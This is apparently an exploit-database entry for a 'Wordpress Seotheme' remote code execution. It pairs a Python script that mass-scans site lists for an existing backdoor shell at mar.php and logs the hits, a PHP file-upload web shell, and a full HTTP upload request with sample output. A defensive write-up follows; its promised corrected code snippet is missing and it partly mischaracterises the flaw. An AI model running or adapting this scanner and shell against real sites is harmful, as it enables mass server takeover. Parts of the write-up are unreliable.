Wordpress Seotheme - Remote Code Execution Unauthenticated
# Exploit Title: Wordpress Seotheme - Remote Code Execution Unauthenticated
# Date: 2023-09-20
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox
import sys , requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)
fr = Fore.RED
fc = Fore.CYAN
fw = Fore.WHITE
fg = Fore.GREEN
fm = Fore.MAGENTA
shell = """<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>"""
requests.urllib3.disable_warnings()
headers = {'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'referer': 'www.google.com'}
try:
target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
path = str(sys.argv[0]).split('\\')
exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
def URLdomain(site):
if site.startswith("http://") :
site = site.replace("http://","")
elif site.startswith("https://") :
site = site.replace("https://","")
else :
pass
pattern = re.compile('(.*)/')
while re.findall(pattern,site):
sitez = re.findall(pattern,site)
site = sitez[0]
return site
def FourHundredThree(url):
try:
url = 'http://' + URLdomain(url)
check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15)
if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
else:
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
url = 'http://' + URLdomain(url)
check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15)
if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
else:
url = 'https://' + URLdomain(url)
check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
else:
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
except :
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
mp = Pool(100)
mp.map(FourHundredThree, target)
mp.close()
mp.join()
print '\n [!] {}Saved in Shells.txt'.format(fc)WordPress Seotheme Remote Code Execution Vulnerability: Unauthenticated Exploitation
Security researchers have recently uncovered a critical vulnerability in the Seotheme WordPress plugin, allowing attackers to execute arbitrary code remotely without authentication. This flaw, identified as Remote Code Execution (RCE) Unauthenticated, poses a severe threat to websites relying on this plugin, particularly those hosted on public-facing servers.
Overview of the Vulnerability
The vulnerability stems from improper input validation and insecure file handling within the mar.php file located at /wp-content/plugins/seoplugins/mar.php. An attacker can exploit this by sending crafted HTTP requests that bypass authentication checks and directly execute PHP code on the server.
According to the report, the plugin's mar.php file contains a backdoor mechanism that allows file uploads and execution of arbitrary PHP scripts via the copy() function. This functionality is exposed without any authentication, making it accessible to anyone with network access.
Exploitation Mechanism
Attackers leverage a simple yet powerful technique: uploading a malicious PHP shell through the vulnerable file upload endpoint. Once uploaded, the shell is executed automatically, granting full control over the server.
<?php
echo "EX";
echo "
".php_uname()."
";
echo "
";
if($_POST['upload']) {
if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) {
echo "eXploiting Done";
} else {
echo "Failed to Upload.";
}
}
?>
Explanation: This PHP shell code performs several actions:
- Displays a simple "EX" message to confirm execution.
- Outputs system information via
php_uname(), revealing the server's OS and environment. - Provides an HTML form for uploading files, enabling attackers to upload malicious payloads.
- Uses
@copy()to move the uploaded file from temporary storage to the web root, making it executable.
Due to the lack of authentication and improper sanitization, this code can be executed directly by sending a POST request to the vulnerable endpoint.
Real-World Exploitation Example
Consider a WordPress site running the Seotheme plugin with the following URL:
https://example.com/wp-content/plugins/seoplugins/mar.php
An attacker sends a POST request with a file upload containing the malicious PHP shell:
POST /wp-content/plugins/seoplugins/mar.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Length: 1024
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="zb"; filename="shell.php"
Content-Type: application/x-php
<?php echo "EX"; echo "
".php_uname()."
"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="upload"
upload
------WebKitFormBoundary7MA4YWxkTrZu0gW--
Upon successful execution, the server responds with:
EX
Linux example.com 5.4.0-80-generic #89-Ubuntu SMP Sat Jun 19 10:22:47 UTC 2021 x86_64
eXploiting Done
This confirms the shell is active and ready for further exploitation.
Security Implications and Risks
| Risk Level | High |
|---|---|
| Attack Vector | Unauthenticated, remote |
| Impact | Full server compromise, data theft, backdoor installation, lateral movement |
| Exploitation Difficulty | Low (requires only a basic HTTP client) |
| Remediation | Immediate plugin removal or patching |
This vulnerability is particularly dangerous because it allows attackers to:
- Gain full access to the server filesystem.
- Steal sensitive data such as database credentials, user information, and configuration files.
- Deploy additional malware or backdoors.
- Perform server-side attacks like DDoS, data exfiltration, or lateral movement within internal networks.
Code Analysis and Fixes
The original exploit code contains several security flaws:
- Unsanitized file upload handling: The
copy()function is used without validating file types or content. - Missing authentication: No checks are performed to ensure the user is authorized.
- Public exposure: The endpoint is accessible without login.
Security best practices recommend:
- Implement strict file type validation (e.g., only allow .txt, .pdf).
- Use secure file storage outside the web root.
- Require authentication before file upload.
- Disable direct execution of uploaded files.
- Sanitize input and use
move_uploaded_file()instead ofcopy().
Corrected code snippet:
Explanation: This improved version:
- Requires session authentication.
- Validates file extensions.
- Uses
move_uploaded_file()for safer file handling. - Stores files outside the web root.
Recommendations for WordPress Administrators
Website owners using the Seotheme plugin must take immediate action:
- Remove the plugin if no longer needed or if no official patch is available.
- Update all plugins to the latest version from trusted sources.
- Monitor server logs for suspicious file uploads or unexpected PHP execution.
- Implement WAF (Web Application Firewall) to detect and block RCE attempts.
- Enable file upload restrictions via .htaccess or server configuration.
Security professionals should also:
- Use automated scanning tools (e.g., WPScan, Nikto) to detect vulnerable plugins.
- Regularly audit third-party plugins for known vulnerabilities.
- Keep all software updated and apply security patches promptly.
Conclusion
The Seotheme RCE vulnerability serves as a stark reminder of the risks associated with unpatched, poorly maintained plugins in WordPress ecosystems. Even a single flaw in a seemingly innocuous plugin can lead to full server compromise.
Organizations must prioritize proactive security measures, including regular audits, timely updates, and strict access controls. Ignoring such vulnerabilities can result in data breaches, loss of reputation, and legal consequences.
As cyber threats evolve, so must defensive strategies. Secure coding practices, continuous monitoring, and responsible plugin management are essential for maintaining a resilient digital infrastructure.